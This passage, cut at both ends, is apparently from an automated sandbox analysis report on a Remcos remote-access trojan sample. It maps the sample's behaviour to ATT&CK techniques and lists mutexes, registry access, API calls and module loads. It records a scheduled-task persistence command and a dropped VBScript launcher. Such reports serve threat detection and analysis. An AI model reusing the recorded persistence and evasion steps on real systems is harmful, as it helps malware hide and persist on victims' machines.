"Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credentials from Web Browsers", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555"}}, {"tactic": "Credential Access", "technique": "Steal Web Session Cookie", "attck_id": "T1539", "attck_id_wiki": "https://attack.mitre.org/techniques/T1539", "suspicious_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 15}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 8, "informative_identifiers_count": 26}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Network Connections Discovery", "attck_id": "T1049", "attck_id_wiki": "https://attack.mitre.org/techniques/T1049", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Network Share Discovery", "attck_id": "T1135", "attck_id_wiki": "https://attack.mitre.org/techniques/T1135", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Internet Connection Discovery", "attck_id": "T1016.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016/001", "informative_identifiers_count": 1, "parent": {"technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 3, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 2}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 2, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 5, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"alg\"\n \"\\Sessions\\1\\BaseNamedObjects\\alg\"\n \"\\Sessions\\1\\BaseNamedObjects\\Remcos-VBI2IL\"\n \"Remcos-VBI2IL\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"Network\" (Path: \"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"Security Manager\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\SHELLFOLDER\")\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"WScript.exe\" touched \"VB Script Language\" (Path: \"HKCU\\CLSID\\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\")\n \"WScript.exe\" touched \"Constructor that allows hosts better control creating scriptlets\" (Path: \"HKCU\\CLSID\\{06290BD1-48AA-11D2-8432-006008C3FBFC}\")\n \"WScript.exe\" touched \"Multi Language Support\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{275C23E2-3747-11D0-9FEA-00AA003F8646}\")\n \"WScript.exe\" touched \"FileSystem Object\" (Path: \"HKCU\\CLSID\\{0D43FE01-F093-11CF-8940-00A0C9054228}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\install.vbs\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"110012009e285c75@CRYPTBASE.dll\"\n \"0d000e00844bfe6a@IPHLPAPI.DLL\"\n \"0f001000dc4bfe6a@IPHLPAPI.DLL\"\n \"0c000d00244cfe6a@IPHLPAPI.DLL\"\n \"140015006c4cfe6a@IPHLPAPI.DLL\"\n \"0c000d00e04cfe6a@IPHLPAPI.DLL\"\n \"15001600c03efe6a@advapi32.DLL\"\n \"0e000f00703ffe6a@advapi32.DLL\"\n \"0e000f00cc3ffe6a@advapi32.DLL\"\n \"11001200b447fe6a@advapi32.DLL\"\n \"110012004848fe6a@advapi32.DLL\"\n \"120013008c48fe6a@advapi32.DLL\"\n \"12001300e448fe6a@advapi32.DLL\"\n \"14001500386efe6a@advapi32.DLL\"\n \"14001500506efe6a@advapi32.DLL\"\n \"14001500686efe6a@advapi32.DLL\"\n \"17001800806efe6a@advapi32.DLL\"\n \"0d000e00986efe6a@advapi32.DLL\"\n \"11001200a86efe6a@advapi32.DLL\"\n \"11001200bc6efe6a@advapi32.DLL\"\n \"0d000e004466fe6a@WININET.dll\"\n \"0d000e00b466fe6a@WININET.dll\"\n \"10001100ec66fe6a@WININET.dll\"\n \"100011009067fe6a@WININET.dll\"\n \"10001100006ffe6a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"remcos.exe.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03\" file has an entrypoint instructions - \"call\t0x434e87,jmp\t0x427c56,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,push\tedi,push\tesi,mov\tesi, dword ptr [esp + 0x10],mov\tecx, dword ptr [esp + 0x14],mov\tedi, dword ptr [esp + 0xc],mov\teax, ecx,mov\tedx, ecx,add\teax, esi,cmp\tedi, esi,jbe\t0x427e00,cmp\tedi, eax,jb\t0x428168,bt\tdword ptr [0x4c31fc], 1,jae\t0x427e11,rep movsb\tbyte ptr es:[edi], byte ptr [esi],jmp\t0x428128,cmp\tecx, 0x80,jb\t0x427feb,mov\teax, edi,xor\teax, esi,test\teax, 0xf,jne\t0x427e36,bt\tdword ptr [0x4be324], 1,\"\n \"remcos.exe.bin\" file has an entrypoint instructions - \"call\t0x434e87,jmp\t0x427c56,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,push\tedi,push\tesi,mov\tesi, dword ptr [esp + 0x10],mov\tecx, dword ptr [esp + 0x14],mov\tedi, dword ptr [esp + 0xc],mov\teax, ecx,mov\tedx, ecx,add\teax, esi,cmp\tedi, esi,jbe\t0x427e00,cmp\tedi, eax,jb\t0x428168,bt\tdword ptr [0x4c31fc], 1,jae\t0x427e11,rep movsb\tbyte ptr es:[edi], byte ptr [esi],jmp\t0x428128,cmp\tecx, 0x80,jb\t0x427feb,mov\teax, edi,xor\teax, esi,test\teax, 0xf,jne\t0x427e36,bt\tdword ptr [0x4be324], 1,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"CreateProcessW\" with parameter \"C:\\006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" - (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\schtasks.exe\" /create /tn cttunesvr /tr \"%APPDATA%\\adprovider\\Dxpserver.exe\" /sc minu\" - (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\WScript.exe\" \"%TEMP%\\install.vbs\"\" - (UID: 00000000-00003032)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\adprovider (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003444)\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003032)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-20", "type": 3, "relevance": 5, "name": "Reads Windows Trust Settings", "description": "\"WScript.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINTRUST\\TRUST PROVIDERS\\SOFTWARE PUBLISHING\"; Key: \"STATE\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 707b0000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"KERNEL32\" at base 75220000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6b240000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"CRYPTBASE.DLL\" at base 74de0000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 739a0000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"KERNEL32.DLL\" at base 75220000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"DWMAPI.DLL\" at base 73a30000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"COMCTL32.DLL\" at base 73d80000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"UXTHEME.DLL\" at base 739a0000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"IMM32.DLL\" at base 75b70000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"COMCTL32\" at base 73d80000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"ADVAPI32.DLL\" at base 75a40000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"CRYPTSP.DLL\" at base 748f0000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74680000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"OLE32.DLL\" at base 76c60000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74d90000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"NTMARTA.DLL\" at base 74350000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 77130000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"RPCRT4.DLL\" at base 75530000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module \"SHELL32.DLL\" at base 75b90000\n \"006052bdcfc75e636564cc92e96237e7331a9c147f1775a3f00e681f78956a03.exe\" loaded module 